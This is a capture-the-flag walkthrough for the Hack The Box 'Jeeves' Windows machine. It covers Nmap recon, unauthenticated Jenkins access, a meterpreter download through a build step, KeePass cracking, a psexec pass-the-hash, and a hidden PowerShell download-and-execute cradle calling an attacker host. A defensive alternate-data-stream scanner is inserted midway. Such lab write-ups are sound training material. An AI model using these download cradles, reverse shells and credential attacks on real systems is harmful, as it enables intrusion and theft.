HTB Jeeves Windows
Recon
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
We use Dirbuster to enumerate the directories served on port 50000.
/askjeeves/ has a Jenkins app running.
To get admin access without authenticating, browse to:
http://10.10.10.63:50000/askjeeves/securityRealm/user/admin/
Exploitation Method 1
- On Jenkins create a new Item “Execute Windows bash command” and select “Freestyle Project”
- Select “Add build step” and choose “Execute Windows batch command”
- In the command box type:
powershell wget "http://10.10.14.14/peterpreter.exe" -outfile "meterpreter.exe"
- Start Apache and place the meterpreter.exe file there for download
- Set up multi/handler
- Run the build on Jenkins to execute the shell
Privilege Escalation Method 1
- Download the CEH.kdbx KeePass file and use keepass2john to create a hash file
- Crack the hash using john with --format=KeePass and --wordlist=rockyou.txt; we obtain the password CEH:moonshine1 and use it to open the KeePass backup file.
- Install KeePass2: apt-get install keepass2
We obtain the admin NTLM hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00. Using the Metasploit windows/smb/psexec module we connect with a pass-the-hash technique:
use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf exploit(windows/smb/psexec) > set lport 8888
msf exploit(windows/smb/psexec) > exploit
The ROOT flag is hidden in an alternate data stream of hm.txt. To view the flag:
dir /R
more < hm.txt:root.txt
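A defender's check for the trick used above: the flag is only hidden in an alternate NTFS data stream, so a directory sweep that lists every non-default stream finds it. This is an added example, not part of the original writeup; the starting directory is an assumption.

```powershell
# Added example (not from the original writeup): report files that carry a
# non-default NTFS data stream, the technique used above to hide root.txt.
function Find-AlternateStreams {
    param(
        # Assumed starting directory; change to the location under review.
        [string]$Root = 'C:\Users\Administrator\Desktop'
    )
    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns every stream on the file, including the default ':$DATA'
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                        # Zone.Identifier is the usual benign stream on downloaded files;
                        # anything else (e.g. root.txt on hm.txt) deserves a closer look.
                        Benign = ($_.Stream -eq 'Zone.Identifier')
                    }
                }
        }
}

# Unexpected streams first, then the benign mark-of-the-web entries.
Find-AlternateStreams | Sort-Object Benign, File | Format-Table -AutoSize
```

Read a suspicious stream with Get-Content -LiteralPath <file> -Stream <name>, the PowerShell equivalent of the more < hm.txt:root.txt redirection above.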
Exploitation Method 2
On Jenkins, create a reverse Groovy shell in the “Script Console” under the “Manage Jenkins” tab and run it.
Set up an nc listener to receive the shell, then set up a meterpreter shell:
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
We paste the following generated code into the netcat listener, and a meterpreter session should be created:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://10.10.14.34:8080/MHGDnJdwHT');
Privilege Escalation Method 2
We use Windows Exploit Suggester and choose the vulnerability MS16-075.
- Upload RottenPotato.exe to the target machine
- In meterpreter, load incognito: load incognito
- Execute the rottenpotato.exe file
- Then type:
impersonate_token "NT AUTHORITY\SYSTEM"
and finally we get root-level access.
Flags
ROOT "afbc5bd4b615a60648cec41c6ac92530"
USER "e3232272596fb47950d59c4cf1e7066a"